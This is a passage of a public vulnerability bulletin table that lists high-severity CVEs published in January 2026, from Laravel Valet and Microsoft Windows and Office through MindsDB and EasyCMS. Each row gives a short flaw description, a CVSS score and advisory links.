| Laravel--Laravel Valet | Laravel Valet versions 1.1.4 to 2.0.3 contain a local privilege escalation vulnerability that allows users to modify the valet command with root privileges. Attackers can edit the symlinked valet command to execute arbitrary code with root permissions without additional authentication. | 2026-01-15 | 8.4 | CVE-2021-47756 | ExploitDB-50591 Laravel Valet Official Documentation VulnCheck Advisory: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS) |
| Leawo--Leawo Prof. Media | Leawo Prof. Media 11.0.0.1 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized payload in the activation keycode field. Attackers can generate a 6000-byte buffer of repeated characters to trigger an application crash when pasted into the registration interface. | 2026-01-15 | 7.5 | CVE-2021-47797 | ExploitDB-50153 Vendor Homepage VulnCheck Advisory: Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC) |
| lemonldap-ng--LemonLDAP::NG | In the portal in LemonLDAP::NG before 2.21.0, cross-site scripting (XSS) allows remote attackers to inject arbitrary web script or HTML (into the login page) via the tab parameter, for Choice authentication. | 2026-01-16 | 7.2 | CVE-2025-31510 | https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3341 |
| Lenovo--ThinkPlus FU100 | A vulnerability was reported in ThinkPlus configuration software that could allow a local authenticated user to bypass ThinkPlus device authentication and enroll an untrusted fingerprint. | 2026-01-14 | 7.8 | CVE-2025-13455 | https://iknow.lenovo.com.cn/detail/436983 |
| Levelprograms--Kmaleon | Kmaleon 1.1.0.205 contains an authenticated SQL injection vulnerability in the 'tipocomb' parameter of kmaleonW.php that allows attackers to manipulate database queries. Attackers can exploit this vulnerability using boolean-based, error-based, and time-based blind SQL injection techniques to potentially extract or manipulate database information. | 2026-01-15 | 7.1 | CVE-2021-47766 | ExploitDB-50499 Archived Kmaleon Software Product Page |
| Litexmedia--Audio Conversion Wizard | Audio Conversion Wizard v2.01 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code by overwriting memory with a specially crafted registration code. Attackers can generate a payload that overwrites the application's memory stack, potentially enabling remote code execution through a carefully constructed input buffer. | 2026-01-13 | 9.8 | CVE-2022-50922 | ExploitDB-50811 Audio Wizard Product Webpage VulnCheck Advisory: Audio Conversion Wizard v2.01 - Buffer Overflow |
| Litexmedia--YouTube Video Grabber | YouTube Video Grabber, now referred to as YouTube Downloader, 1.9.9.1 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code by overwriting the Structured Exception Handler. Attackers can craft a malicious payload of 712 bytes with SEH manipulation to trigger a bind shell connection on a specified local port. | 2026-01-15 | 8.4 | CVE-2021-47775 | ExploitDB-50471 Product Webpage |
| Macro-Expert--Macro Expert | Macro Expert 4.7 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the improperly configured service path to inject malicious executables that will be run with LocalSystem permissions during service startup. | 2026-01-15 | 7.8 | CVE-2021-47780 | ExploitDB-50431 Macro Expert Official Website VulnCheck Advisory: Macro Expert 4.7 - Unquoted Service Path |
| Mailhog--Mailhog | Mailhog 1.0.1 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through email attachments. Attackers can send crafted emails with XSS payloads to execute arbitrary API calls, including message deletion and browser manipulation. | 2026-01-13 | 7.2 | CVE-2022-50908 | ExploitDB-50971 MailHog GitHub Repository Shodan Search Results for MailHog VulnCheck Advisory: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) |
| Malavida--Cain & Abel | Cain & Abel 4.9.56 contains an unquoted service path vulnerability that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions. | 2026-01-13 | 8.4 | CVE-2022-50933 | ExploitDB-50728 Official Software Download Page VulnCheck Advisory: Cain & Abel 4.9.56 - Unquoted Service Path |
| MCPJam--inspector | MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch. | 2026-01-16 | 9.8 | CVE-2026-23744 | https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6 https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a |
| MegaTKC--Aero CMS | Aero CMS 0.0.1 contains a SQL injection vulnerability in the author parameter that allows attackers to manipulate database queries. Attackers can exploit boolean-based, error-based, time-based, and UNION query techniques to extract sensitive database information and potentially compromise the system. | 2026-01-13 | 8.2 | CVE-2022-50895 | ExploitDB-51022 Archived AeroCMS GitHub Repository Vulnerability Research Repository VulnCheck Advisory: Aero CMS 0.0.1 - SQL Injection |
| Merit LILIN--DH032 | Certain DVR/NVR models developed by Merit LILIN has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the device. | 2026-01-12 | 8.8 | CVE-2026-0854 | https://www.twcert.org.tw/tw/cp-132-10624-6599c-1.html https://www.twcert.org.tw/en/cp-139-10623-4f523-2.html |
| Merit LILIN--P2 | Certain IP Camera models developed by Merit LILIN has a OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the device. | 2026-01-12 | 8.8 | CVE-2026-0855 | https://www.twcert.org.tw/tw/cp-132-10625-fac5c-1.html https://www.twcert.org.tw/en/cp-139-10626-afbe2-2.html |
| metagauss--RegistrationMagic Custom Registration Forms, User Registration, Payment, and User Login | The RegistrationMagic plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.0.7.1. This is due to the 'add_menu' function is accessible via the 'rm_user_exists' AJAX action and allows arbitrary updates to the 'admin_order' setting. This makes it possible for unauthenticated attackers to injecting an empty slug into the order parameter, and manipulate the plugin's menu generation logic, and when the admin menu is subsequently built, the plugin adds 'manage_options' capability for the target role. Note: The vulnerability can only be exploited unauthenticated, but further privilege escalation requires at least a subscriber user. | 2026-01-17 | 9.8 | CVE-2025-15403 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68dd9f6f-ccee-4a27-bd21-2fb32b92cc62?source=cve https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/controllers/class_rm_options_controller.php#L562 https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/admin/class_rm_admin.php#L487 https://plugins.trac.wordpress.org/changeset/3440797/custom-registration-form-builder-with-submission-manager#file2 |
| Microsoft--Azure Connected Machine Agent | Stack-based buffer overflow in Azure Connected Machine Agent allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-21224 | Azure Connected Machine Agent Elevation of Privilege Vulnerability |
| Microsoft--Azure Core shared client library for Python | Deserialization of untrusted data in Azure Core shared client library for Python allows an authorized attacker to execute code over a network. | 2026-01-13 | 7.5 | CVE-2026-21226 | Azure Core shared client library for Python Remote Code Execution Vulnerability |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-01-13 | 8.4 | CVE-2026-20944 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Microsoft 365 Apps for Enterprise | Improper access control in Microsoft Office Excel allows an unauthorized attacker to bypass a security feature locally. | 2026-01-13 | 7.8 | CVE-2026-20949 | Microsoft Excel Security Feature Bypass Vulnerability |
| Microsoft--Microsoft 365 Apps for Enterprise | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20956 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office 2019 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-01-13 | 8.4 | CVE-2026-20952 | Microsoft Office Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office 2019 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-01-13 | 8.4 | CVE-2026-20953 | Microsoft Office Remote Code Execution Vulnerability |
| Microsoft--Microsoft Office 2019 | Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20946 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Microsoft Power Apps | Improper authorization in Microsoft Power Apps allows an authorized attacker to execute code over a network. | 2026-01-16 | 8 | CVE-2026-20960 | Microsoft Power Apps Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-01-13 | 8.8 | CVE-2026-20947 | Microsoft SharePoint Server Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-01-13 | 8.8 | CVE-2026-20963 | Microsoft SharePoint Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Untrusted pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20948 | Microsoft Word Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper input validation in Microsoft Office SharePoint allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20951 | Microsoft SharePoint Server Remote Code Execution Vulnerability |
| Microsoft--Microsoft SharePoint Server 2019 | Untrusted search path in Microsoft Office allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7 | CVE-2026-20943 | Microsoft Office Click-To-Run Elevation of Privilege Vulnerability |
| Microsoft--Microsoft SQL Server 2022 (GDR) | Missing authentication for critical function in SQL Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.2 | CVE-2026-20803 | Microsoft SQL Server Elevation of Privilege Vulnerability |
| Microsoft--Office Online Server | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20950 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Untrusted pointer dereference in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20955 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Office Online Server | Integer underflow (wrap or wraparound) in Microsoft Office Excel allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20957 | Microsoft Excel Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper input validation in Windows Server Update Service allows an unauthorized attacker to execute code over a network. | 2026-01-13 | 8.1 | CVE-2026-20856 | Windows Server Update Service (WSUS) Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network. | 2026-01-13 | 8.8 | CVE-2026-20868 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | External control of file name or path in Windows Telephony Service allows an authorized attacker to elevate privileges over an adjacent network. | 2026-01-13 | 8 | CVE-2026-20931 | Windows Telephony Service Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Incorrect privilege assignment in Windows Hello allows an unauthorized attacker to perform tampering locally. | 2026-01-13 | 7.7 | CVE-2026-20804 | Windows Hello Tampering Vulnerability |
| Microsoft--Windows 10 Version 1809 | Time-of-check time-of-use (toctou) race condition in Windows Kernel Memory allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20809 | Windows Kernel Memory Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Free of memory not on the heap in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20810 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Graphics Kernel allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20814 | DirectX Graphics Kernel Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Time-of-check time-of-use (toctou) race condition in Windows Installer allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20816 | Windows Installer Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20822 | Windows Graphics Component Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Tablet Windows User Interface (TWINUI) Subsystem allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20826 | Tablet Windows User Interface (TWINUI) Subsystem Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Time-of-check time-of-use (toctou) race condition in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20831 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Windows Remote Procedure Call Interface Definition Language (IDL) Elevation of Privilege Vulnerability | 2026-01-13 | 7.8 | CVE-2026-20832 | Windows Remote Procedure Call Interface Definition Language (IDL) Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Graphics Kernel allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20836 | DirectX Graphics Kernel Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows Media allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20837 | Windows Media Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Windows NTFS allows an authorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20840 | Windows NTFS Remote Code Execution Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20843 | Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Clipboard Server allows an unauthorized attacker to elevate privileges locally. | 2026-01-13 | 7.4 | CVE-2026-20844 | Windows Clipboard Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20848 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Reliance on untrusted inputs in a security decision in Windows Kerberos allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20849 | Windows Kerberos Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Incorrect privilege assignment in Windows Hello allows an unauthorized attacker to perform tampering locally. | 2026-01-13 | 7.7 | CVE-2026-20852 | Windows Hello Tampering Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows WalletService allows an unauthorized attacker to elevate privileges locally. | 2026-01-13 | 7.4 | CVE-2026-20853 | Windows WalletService Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20858 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Access of resource using incompatible type ('type confusion') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20860 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20861 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Heap-based buffer overflow in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20864 | Windows Connected Devices Platform Service Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20865 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20866 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20867 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Local Session Manager (LSM) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20869 | Windows Local Session Manager (LSM) Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20873 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20874 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Null pointer dereference in Windows Local Security Authority Subsystem Service (LSASS) allows an unauthorized attacker to deny service over a network. | 2026-01-13 | 7.5 | CVE-2026-20875 | Windows Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20877 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20918 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20919 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20921 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20923 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Use after free in Windows Management Services allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20924 | Windows Management Services Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20926 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Improper access control in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20929 | Windows HTTP.sys Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 1809 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows SMB Server allows an authorized attacker to elevate privileges over a network. | 2026-01-13 | 7.5 | CVE-2026-20934 | Windows SMB Server Elevation of Privilege Vulnerability |
| Microsoft--Windows 10 Version 22H2 | Heap-based buffer overflow in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20940 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Untrusted pointer dereference in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20857 | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows 11 Version 25H2 | Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20938 | Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability |
| Microsoft--Windows Admin Center in Azure Portal | Improper verification of cryptographic signature in Windows Admin Center allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.5 | CVE-2026-20965 | Windows Admin Center Elevation of Privilege Vulnerability |
| Microsoft--Windows SDK | Use after free in Inbox COM Objects allows an unauthorized attacker to execute code locally. | 2026-01-13 | 7 | CVE-2026-21219 | Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability |
| Microsoft--Windows Server 2019 | Improper access control in Windows Deployment Services allows an unauthorized attacker to execute code over an adjacent network. | 2026-01-13 | 7.5 | CVE-2026-0386 | Windows Deployment Services Remote Code Execution Vulnerability |
| Microsoft--Windows Server 2022 | Access of resource using incompatible type ('type confusion') in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20811 | Win32k Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Improper handling of insufficient permissions or privileges in Windows Error Reporting allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20817 | Windows Error Reporting Service Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Heap-based buffer overflow in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20820 | Windows Common Log File System Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Use after free in Windows DWM allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20842 | Microsoft DWM Core Library Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Double free in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20863 | Win32k Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Use after free in Desktop Windows Manager allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20871 | Desktop Windows Manager Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Use after free in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20920 | Win32k Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2022 | Heap-based buffer overflow in Windows NTFS allows an authorized attacker to execute code locally. | 2026-01-13 | 7.8 | CVE-2026-20922 | Windows NTFS Remote Code Execution Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Printer Association Object allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20808 | Windows File Explorer Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20815 | Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-20830 | Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Use after free in Windows Local Security Authority Subsystem Service (LSASS) allows an authorized attacker to execute code over a network. | 2026-01-13 | 7.5 | CVE-2026-20854 | Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Use after free in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20859 | Windows Kernel-Mode Driver Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Use after free in Windows Win32K - ICOMP allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20870 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Improper link resolution before file access ('link following') in Host Process for Windows Tasks allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7.8 | CVE-2026-20941 | Host Process for Windows Tasks Elevation of Privilege Vulnerability |
| Microsoft--Windows Server 2025 (Server Core installation) | Concurrent execution using shared resource with improper synchronization ('race condition') in Capability Access Management Service (camsvc) allows an authorized attacker to elevate privileges locally. | 2026-01-13 | 7 | CVE-2026-21221 | Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability |
| Millegpg--MilleGPG5 | MilleGPG5 5.7.2 contains a local privilege escalation vulnerability that allows authenticated users to modify service executable files in the MariaDB bin directory. Attackers can replace the mysqld.exe with a malicious executable, which will execute with system privileges when the computer restarts. | 2026-01-15 | 7.8 | CVE-2021-47761 | ExploitDB-50558 Vendor Homepage |
| mindsdb--mindsdb | MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.11.1, an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB's storage, exposing sensitive data. The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and source_type is not "url". Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to clear_filename or equivalent checks. This vulnerability is fixed in 25.11.1. | 2026-01-12 | 8.1 | CVE-2025-68472 | https://github.com/mindsdb/mindsdb/security/advisories/GHSA-qqhf-pm3j-96g7 |
| MIT--Kerberos 5 | In MIT Kerberos 5 (aka krb5) before 1.22 (with incremental propagation), there is an integer overflow for a large update size to resize() in kdb_log.c. An authenticated attacker can cause an out-of-bounds write and kadmind daemon crash. | 2026-01-16 | 7.1 | CVE-2025-24528 | https://github.com/krb5/krb5/commit/78ceba024b64d49612375be4a12d1c066b0bfbd0 https://github.com/krb5/krb5/compare/krb5-1.21.3-final...krb5-1.22-final |
| Modular DS--Modular DS | Incorrect Privilege Assignment vulnerability in Modular DS allows Privilege Escalation.This issue affects Modular DS: from n/a through 2.5.1. | 2026-01-14 | 10 | CVE-2026-23550 | https://patchstack.com/database/wordpress/plugin/modular-connector/vulnerability/wordpress-modular-ds-monitor-update-and-backup-multiple-websites-plugin-2-5-1-privilege-escalation-vulnerability?_s_id=cve https://patchstack.com/articles/critical-privilege-escalation-vulnerability-in-modular-ds-plugin-affecting-40k-sites-exploited-in-the-wild/ https://help.modulards.com/en/article/modular-ds-security-release-modular-connector-252-dm3mv0/ |
| Moeditor--Moeditor | Moeditor 0.2.0 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads within markdown files. Attackers can upload specially crafted markdown files with embedded JavaScript that execute when opened, potentially enabling remote code execution on the victim's system. | 2026-01-16 | 7.2 | CVE-2021-47840 | ExploitDB-49830 Moeditor Official Homepage Proof of Concept Video VulnCheck Advisory: Moeditor 0.2.0 - Persistent Cross-Site Scripting |
| Mp3-Avi-Mpeg-Wmv-Rm-To-Audio-Cd-Burner--Ether_MP3_CD_Burner | Ether MP3 CD Burner 1.3.8 contains a buffer overflow vulnerability in the registration name field that allows remote code execution. Attackers can craft a malicious payload to overwrite SEH handlers and execute a bind shell on port 3110 by exploiting improper input validation. | 2026-01-15 | 9.8 | CVE-2021-47785 | ExploitDB-50332 Software Download Link VulnCheck Advisory: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH) |
| mrvladus--Errands | Errands before 46.2.10 does not verify TLS certificates for CalDAV servers. | 2026-01-12 | 8.2 | CVE-2025-71063 | https://github.com/mrvladus/Errands/issues/401 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1123738 https://github.com/mrvladus/Errands/releases/tag/46.2.10 https://github.com/mrvladus/Errands/commit/04e567b432083fc798ea2249363ea6c83ff01099 https://github.com/mrvladus/Errands/compare/46.2.9...46.2.10 |
| n/a--EasyCMS | A vulnerability was identified in EasyCMS up to 1.6. This vulnerability affects unknown code of the file /UserAction.class.php. Such manipulation of the argument _order leads to sql injection. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-17 | 7.3 | CVE-2026-1105 | VDB-341697 | EasyCMS UserAction.class.php sql injection VDB-341697 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #731465 | https://github.com/TeamEasy/EasyCMS EasyCMS v1.6 SQL injection vulnerability https://github.com/ueh1013/VULN/issues/15 |
